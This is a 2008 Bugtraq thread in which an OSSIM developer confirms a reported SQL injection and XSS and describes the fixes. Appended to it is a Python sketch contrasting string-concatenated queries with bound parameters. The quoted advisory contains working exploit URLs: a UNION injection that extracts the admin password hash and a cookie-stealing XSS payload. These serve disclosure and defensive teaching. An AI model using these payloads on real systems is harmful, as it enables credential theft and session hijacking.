Open Source and information security mailing list archives
 
Message-Id: <CCF03CDE-D1BF-4D27-AFF2-A9E78A54F311@ossim.net>
Date: Fri, 22 Feb 2008 08:50:52 +0100
From: Dominique Karg <dk@...im.net>
To: marcin.kopec@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)

Hello,

I can confirm this affects earlier versions as well. The XSS was
fixed some months ago; the SQL injection (and others) were caused
by a failure in the "punctuation" validation regexp. Just fixed that
one as well as some others.

We're going to release a fixed version asap after stopping development
in order to get a thorough security audit done. The SQL regexp I
just fixed and we'll update the packages today.

Nonetheless, exposure should be minimal since:

a) You aren't going to provide public access to your SIM console,
are you?
b) Regarding the specific SQL injection mentioned in here (as said,  
there are more we're going to fix), you shouldn't give access to the  
policy section to normal users either.

I must thank you for pointing this out but would've appreciated a more
"direct" contact, as it is considered a polite way of releasing bugs.

Greetings,

Dominique

On 21.02.2008 at 13:47, marcin.kopec@...mail.com wrote:

> Application: OSSIM
> http://www.ossim.net
> Version: 0.9.9rc5
> Note: it is possible that the problem affects also earlier OSSIM  
> versions
> Platforms: Linux
> Bug: SQL injection, Cross Site Scripting
> Exploitation: remote
> Date: 21 Feb 2008
> Author: Marcin Kopec
> E-mail: marcin(dot)kopec(at)hotmail(dot)com
>
> ---------------------------------------
>
> 1) Introduction
>
> OSSIM is a free implementation of a Security Information Management
> (SIM) system, equipped with many useful security tools (nessus,
> snort, p0f, ntop, ...) managed from an easy-to-use web panel.
>
> 2) SQL injection
>
> The bug exists in the portname parameter of modifyportform.php.
> It's possible to obtain the hashed administrator password when a user has
> rights to do port modification in the "PORTS" tab.
>
> http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and 
> %201=2%20union%20select%20pass,2%20from%20ossim.users%20where 
> %20login='admin
>
> 3) XSS
>
> Quotes in OSSIM aren't properly sanitized.
> The XSS below may be executed without logging into OSSIM.
>
> http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript 
> %3Ealert(document.cookie)%3C/script%3E%3C!--
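
Added example, not part of the original thread and not OSSIM's code: a Python/sqlite3 sketch of why a "punctuation" validation regexp that admits a quote does not protect a concatenated query, next to the allowlist-plus-bound-parameter form. Both regexps, the port_group table and its columns are assumptions; the input is the portname value from the report above.

```python
import re
import sqlite3
from urllib.parse import unquote

# The portname value from the report above, URL-decoded.
REPORTED = unquote("ANY'%20and%201=2%20union%20select%20pass,2%20from"
                   "%20ossim.users%20where%20login='admin")

# Hypothetical validators (OSSIM's real regexps are not shown in this thread).
LOOSE_PUNCT = re.compile(r"[\w\s.,:;'=()-]*")      # punctuation class lets ' through
STRICT_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")  # allowlist for a port name


def make_db():
    """Constructed stand-in schema; table and column names are assumed."""
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS ossim")
    db.execute("CREATE TABLE ossim.users (login TEXT, pass TEXT)")
    db.execute("CREATE TABLE ossim.port_group (name TEXT, descr TEXT)")
    db.execute("INSERT INTO ossim.users VALUES ('admin', 'CONSTRUCTED-HASH')")
    db.execute("INSERT INTO ossim.port_group VALUES ('web', 'HTTP and HTTPS')")
    return db


def is_valid_portname(value):
    """Allowlist check: reject anything outside the expected name alphabet."""
    return STRICT_NAME.fullmatch(value) is not None


def lookup_concat(db, portname):
    """'Before' form: value spliced into the SQL text, so a quote ends the literal."""
    sql = "SELECT name, descr FROM ossim.port_group WHERE name = '" + portname + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, portname):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT name, descr FROM ossim.port_group WHERE name = ?"
    return db.execute(sql, (portname,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("loose regexp accepts:", LOOSE_PUNCT.fullmatch(REPORTED) is not None)
    print("allowlist accepts:   ", is_valid_portname(REPORTED))
    print("concatenated query:  ", lookup_concat(db, REPORTED))
    print("bound parameter:     ", lookup_bound(db, REPORTED))
```

Binding is the control that removes the injection; the allowlist is a second layer that also stops unexpected values from being stored or echoed back.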
